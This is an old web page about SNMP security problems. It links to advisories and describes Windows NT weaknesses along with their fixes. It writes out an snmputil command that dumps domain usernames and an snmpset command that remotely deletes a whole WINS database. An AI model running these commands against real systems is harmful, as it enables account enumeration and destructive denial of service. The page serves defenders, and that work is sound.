WTCS.ORG

Things you should know


SNMP Security Issues    Monitoring Tips and Techniques


SNMP Security Issues

As with any protocol, if properly managed, SNMP can provide you with the ability to effectively control and monitor your network devices.  Left unsecured, this power can easily be misused.

This page attempts to inform you of some of the security issues surrounding SNMP.

The bottom line:  Keep your SNMP inaccessible from the Internet (block those ports), and know your internal risks!

 

General Information

First and Foremost - Check here for the latest on general SNMP vulnerabilities

CERT Advisory (CA-2002-03) (CERT)

Understanding the Risks of SNMP Vulnerabilities (Lucent)

ANALYSIS: Dealing With New SNMP Vulnerabilities (Internet Week - Tom Smith)

Scanning for SNMP Vulnerabilities (The Register - Thomas C. Greene)

Read Community Guessable (SAINT Corp)

SNMP Vulnerabilities (SANS)

 

Microsoft Specific

Well, it seems that Microsoft's implementation of SNMP has a couple of security holes.

Snmp.exe Leaks Memory When Querying Printer Objects in Lmmib2.mib If Spooler Is Stopped.  More information here.

Microsoft Windows 2000 SNMP Vulnerabilities (SANS)

Windows 2000 SNMP Vulnerability Alert (Microsoft)

SNMP Security on Windows NT (NAI)

Domain User list dump (example)

WINS database deletion (example)


Domain exploit - demonstrates the ability via SNMP to dump a list of all usernames in an NT domain (assuming the target box is a DC) or on an NT Server.  Try this:
snmputil walk <hostname> <community> .1.3.6.1.4.1.77.1.2.25
<hostname> should be a domain controller or server

grnball.gif (995 bytes)  FIX: OK, so here's the answer to this one.  If you start the registry editor (start/run/regedt32), and navigate to HKEY_LOCAL_MACHINE/System/CurrentControlSet/Services/SNMP/Parameters/ExtensionAgents and delete the highlighted key shown in the picture below, then the LanManager MIB extension DLL (lmmib2.dll) will not load, and subsequently the user account names, etc. will not be accessible.  Too easy, huh?
Registry showning LANMAN MIB
(you could also just delete %systemroot%\system32\lmmib2.dll, but you would probably see an error in the event log when it was not found)


WINS exploit - demonstrates the ability via SNMP to delete all of the records in a WINS database remotely, bypassing all NT security.    If you understand large scale WINS architecture, you can understand the implications of this.

Knowledge of SNMP community strings would allow an attacker to effectively shut down any large NT infrastructure with "N" commands (N=number of WINS servers).    This is permitted due to the extensive "cmd" set implemented in the WINS extension agent, specifically:

cmdDeleteWins OBJECT-TYPE
                        SYNTAX IpAddress
                        ACCESS read-write
                        STATUS mandatory
                        DESCRIPTION "This variable when set will cause all information pertaining to a WINS
                        (data records, context information to be deleted from the local WINS.
                        Use this only when owner-address mapping table is getting to near capacity.
                        NOTE: deletion of all information pertaining to the managed WINS is not
                        permitted" ::= { cmd 3 }

Since the SNMP toolset implemented under NT will not do snmp-set-requests, the sample exploit was done using the CMU SNMP development kit under Unix.   The command "snmpset -v 1 192.178.16.2 public .1.3.6.1.4.1.311.1.2.5.3.0 a 192.178.16.2" successfully deleted an entire WINS database.

grnball.gif (995 bytes)  FIX:   Apply Service Pack 4 or above (on NT4)


Monitoring Tips and Techniques

Using COM to add PERFMON support to your apps

How to Manage and Monitor Exchange Server

 


To return the the main page, click the Go Home! logo!